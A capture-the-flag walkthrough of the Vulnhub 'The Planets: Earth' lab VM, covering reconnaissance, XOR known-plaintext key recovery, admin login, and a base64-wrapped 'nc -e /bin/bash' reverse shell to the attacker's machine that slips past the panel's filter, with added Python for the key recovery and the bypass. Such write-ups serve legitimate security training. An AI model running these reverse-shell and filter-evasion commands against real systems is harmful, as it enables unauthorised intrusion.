Vulnhub: The Planets: Earth target machine walkthrough
阿新 • Published: 2022-12-11
The Planets Earth
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.134.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:6f:27:91      1      60  PCS Systemtechnik GmbH
 192.168.56.229  08:00:27:c0:ac:18      1      60  PCS Systemtechnik GmbH
The netdiscover tool bundled with Kali Linux identifies the target host as 192.168.56.229. On a VirtualBox host-only network, .1 is the host's own adapter and .100 is VirtualBox's DHCP server, so the remaining address is the target.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.229 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-10 08:40 EST
Nmap scan report for bogon (192.168.56.229)
Host is up (0.00034s latency).
Not shown: 65382 filtered tcp ports (no-response), 150 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:C0:AC:18 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.33 seconds
The Nmap output reveals two hostnames in the TLS certificate's Subject Alternative Name, earth.local and terratest.earth.local. Add both to /etc/hosts:
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo vim /etc/hosts

┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.229  terratest.earth.local
192.168.56.229  earth.local
Getting a shell
Port 80 has to be accessed by hostname rather than by IP address: the server uses name-based virtual hosts, which is why Nmap saw "Bad Request (400)" as the page title when it requested the IP directly. Then enumerate directories on earth.local:
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ gobuster dir -u http://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://earth.local
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/10 21:40:27 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 0] [--> /admin/]
Progress: 220100 / 220561 (99.79%)
===============================================================
2022/12/10 21:43:51 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl -k https://terratest.earth.local/robots.txt
User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*
robots.txt on terratest.earth.local disallows /testingnotes.* without giving the extension. Guessing .txt, i.e. /testingnotes.txt:
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl https://terratest.earth.local/testingnotes.txt -k
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
From testingnotes.txt we learn:
- the admin portal username is terra
- the messages on the home page are encrypted with XOR
- testdata.txt is the plaintext that was encrypted to test the system; since XOR is its own inverse, XORing the ciphertext with that known plaintext gives back the key
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl https://terratest.earth.local/testdata.txt -k
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
Open CyberChef in the browser and use the XOR recipe with the key set to the contents of testdata.txt (key type UTF8):
The input is the ciphertext, the third hex string shown on the home page:
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
The output is one string repeated over and over, which is the XOR key and, as it turns out, the admin portal password:
earthclimatechangebad4humans
So the credentials are:
username: terra
password: earthclimatechangebad4humans
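The same known-plaintext recovery done in Python, as an added example that is not part of the original post (which used CyberChef). The ciphertext and plaintext embedded below are the first 84 bytes of the hex string above and the matching prefix of testdata.txt; the rest of both files is omitted. Beyond what CyberChef showed, the period search also reports the key length, and it returns only a partial key when the known plaintext is shorter than the key.

```python
"""Known-plaintext recovery of a repeating XOR key.

Added example, not the box author's code. testdata.txt is the *plaintext*
that was encrypted, and the hex blob on the home page is the ciphertext.
Because XOR is its own inverse, ciphertext XOR plaintext yields the
keystream, and the keystream's shortest period is the key itself.
"""
from itertools import cycle

# First 84 bytes (168 hex chars) of the third hex string on the home page.
CIPHER_HEX = (
    "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f07"
    "0c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a"
    "01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d554046"
)
# Matching 84-character prefix of testdata.txt.
KNOWN_PLAINTEXT = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a key that repeats as often as needed."""
    if not key:
        raise ValueError("empty key")
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def keystream_from_known_plaintext(ciphertext: bytes, plaintext: bytes) -> bytes:
    """Recover as many keystream bytes as there is known plaintext for."""
    n = min(len(ciphertext), len(plaintext))
    return bytes(c ^ p for c, p in zip(ciphertext[:n], plaintext[:n]))


def shortest_period(stream: bytes) -> int:
    """Smallest p with stream[i] == stream[i + p] for every valid i.

    Returns len(stream) when no repetition is visible, which happens when the
    known plaintext is shorter than the key: only a partial key is recovered
    then, and nothing in the data can confirm the key length.
    """
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i + p] for i in range(len(stream) - p)):
            return p
    return len(stream)


def recover_key(cipher_hex: str, plaintext: bytes) -> bytes:
    """Full known-plaintext attack: keystream, then truncate to one period."""
    ks = keystream_from_known_plaintext(bytes.fromhex(cipher_hex), plaintext)
    return ks[: shortest_period(ks)]


if __name__ == "__main__":
    key = recover_key(CIPHER_HEX, KNOWN_PLAINTEXT)
    print(f"key length {len(key)}: {key.decode()}")
    # Decrypting with the recovered key must reproduce the known plaintext.
    assert xor_bytes(bytes.fromhex(CIPHER_HEX), key) == KNOWN_PLAINTEXT
```

With the prefix above the recovered keystream repeats every 28 bytes, so the key is 28 characters long; the notes' worry about "how long should the key be" misses the point, since any repeating XOR key falls to a single known plaintext longer than the key.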
Log in to the admin portal (/admin on earth.local, found by gobuster above). After a successful login the page presents a command-execution box.
Entering nc -e /bin/bash 192.168.56.206 5555 (192.168.56.206 being the Kali machine)
returns the error: Remote connections are forbidden.
The panel rejects the command as typed, so base64-encode it to keep the original text away from the filter and have the target decode and execute it:
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ echo 'nc -e /bin/bash 192.168.56.206 5555' | base64
bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMjA2IDU1NTUK
Then enter in the command box:
echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMjA2IDU1NTUK | base64 -d | bash
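The encoding trick above, worked through in Python as an added example that is not part of the original post. The panel's real filtering code is not shown on the page, so FORBIDDEN_PATTERN below is a constructed stand-in that rejects any command containing a dotted-quad IP address, which is consistent with the error message seen; the point it demonstrates is that the base64 alphabet contains neither '.' nor spaces, so the encoded form cannot match such a pattern, and the decoding happens on the target.

```python
"""Wrapping a reverse-shell command in base64 to get it past a naive text filter.

Added example, not the box's or the original author's code.
"""
import base64
import re
import shlex

# Hypothetical model of the admin panel's check (an assumption, not the box's
# actual code): reject anything that looks like it carries an IPv4 address.
FORBIDDEN_PATTERN = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def naive_filter_accepts(command: str) -> bool:
    """True if the modelled filter would let the command through."""
    return FORBIDDEN_PATTERN.search(command) is None


def reverse_shell_command(lhost: str, lport: int) -> str:
    """The same nc -e one-liner used on the page, parameterised."""
    return f"nc -e /bin/bash {lhost} {lport}"


def wrap_base64(command: str) -> str:
    """Return an equivalent command whose only variable text is base64.

    base64.b64encode never emits a newline, unlike `echo ... | base64`, whose
    trailing newline survives the round trip (harmless when piped into bash,
    which is why the page's version still works).
    """
    encoded = base64.b64encode(command.encode()).decode("ascii")
    return f"echo {encoded} | base64 -d | bash"


def simulate_target(wrapped: str) -> str:
    """What the target ends up running: decode the blob and hand it to bash.

    Checks the wrapper has the expected shape and returns the decoded command
    instead of executing it, so the example is safe to run anywhere.
    """
    tokens = shlex.split(wrapped)
    if tokens[0] != "echo" or tokens[2:] != ["|", "base64", "-d", "|", "bash"]:
        raise ValueError("unexpected wrapper shape")
    return base64.b64decode(tokens[1]).decode()


if __name__ == "__main__":
    raw = reverse_shell_command("192.168.56.206", 5555)
    wrapped = wrap_base64(raw)
    print("raw accepted:    ", naive_filter_accepts(raw))
    print("wrapped accepted:", naive_filter_accepts(wrapped))
    print("target executes: ", simulate_target(wrapped))
```

Any filter that only inspects the submitted string is defeated this way; the durable fix on the server side is not to pass user input to a shell at all.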
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.229] 40676
id
uid=48(apache) gid=48(apache) groups=48(apache)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-5.1$ ls
We now have a shell on the target from Kali Linux, running as the apache user; the python pty one-liner above upgrades it to an interactive bash prompt.